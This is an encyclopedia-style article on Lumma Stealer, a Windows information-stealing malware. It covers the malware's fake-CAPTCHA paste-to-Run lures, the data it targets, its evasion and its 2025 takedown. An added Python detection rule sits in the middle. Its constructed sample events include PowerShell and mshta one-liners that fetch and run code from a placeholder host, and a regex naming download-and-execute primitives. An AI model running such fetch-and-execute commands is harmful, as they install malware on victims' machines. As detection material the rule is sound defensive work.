Lumma Stealer
Lumma Stealer is an information-stealing malware sold as a malware-as-a-service (MaaS) offering and developed for Microsoft Windows.
Technical overview
Lumma Stealer is distributed by affiliates through a number of campaigns, including phishing emails, malicious advertisements posing as legitimate downloads, and compromised websites. It is frequently associated with fake CAPTCHA pages that prompt the user to paste a command into the Windows Run box. It steals data from a number of programs, including web browsers, cryptocurrency wallets and chat applications, as well as user files. The exfiltrated data is sent to a number of hardcoded command-and-control servers, falling back to Telegram, Dropbox and Steam if those servers are unreachable.

Lumma Stealer employs advanced obfuscation techniques and uses process hollowing to impersonate legitimate programs in order to evade detection. It delays detonation until a sufficient amount of human-like activity has occurred. Instead of calling the Windows API, it issues direct system calls.
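The fake-CAPTCHA lure described above leaves a characteristic trace: explorer.exe (which hosts the Run dialog) spawning a script host whose command line fetches or decodes remote content. The following detection logic is an added example and is not code from the original article or from any vendor; the record shape is modelled on Sysmon process-creation fields, and all sample events are constructed.

```python
import re
from dataclasses import dataclass


# Hypothetical record shape, modelled on Sysmon Event ID 1 fields.
@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Script hosts commonly typed into the Run box by paste-to-run lures.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe",
                "cmd.exe", "wscript.exe", "cscript.exe"}

# Signs that a one-liner pulls in or decodes code rather than running a local tool.
REMOTE_OR_ENCODED = re.compile(
    r"(https?://|\biwr\b|invoke-webrequest|downloadstring|\biex\b|"
    r"invoke-expression|-enc(odedcommand)?\b)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_runbox_paste(evt: ProcessEvent) -> bool:
    """True when the Run dialog's host (explorer.exe) launches a script host
    whose command line references remote or encoded content. A user starting
    a plain PowerShell prompt from Run is deliberately not flagged; corroborate
    hits with HKCU\\...\\Explorer\\RunMRU, which records Run-dialog history."""
    return (basename(evt.parent_image) == "explorer.exe"
            and basename(evt.image) in SCRIPT_HOSTS
            and REMOTE_OR_ENCODED.search(evt.command_line) is not None)


def triage(events: list[ProcessEvent]) -> list[ProcessEvent]:
    return [e for e in events if is_runbox_paste(e)]


# Constructed sample telemetry (not real indicators); example.invalid is reserved.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iwr http://example.invalid/v | iex"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta http://example.invalid/verify"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c iwr http://example.invalid/build.ps1"),  # parent is not explorer
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -noprofile"),  # benign interactive launch
]
```

The fourth sample is left unflagged on purpose: it is a different parent chain and belongs to a separate rule.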
History
Lumma is believed to have first appeared on cybercrime forums in 2022. From March to May 2025, Microsoft identified 394,000 computers infected with Lumma. In 2025, Lumma was the second most common sample uploaded to ANY.RUN and the third most common on MalwareBazaar. In May 2025, Microsoft announced the seizure of 2,300 domains associated with Lumma through a vulnerability. Although Lumma continued to operate, the takedown was believed to have possibly damaged its reputation. Between June and July, activity associated with Lumma rebounded.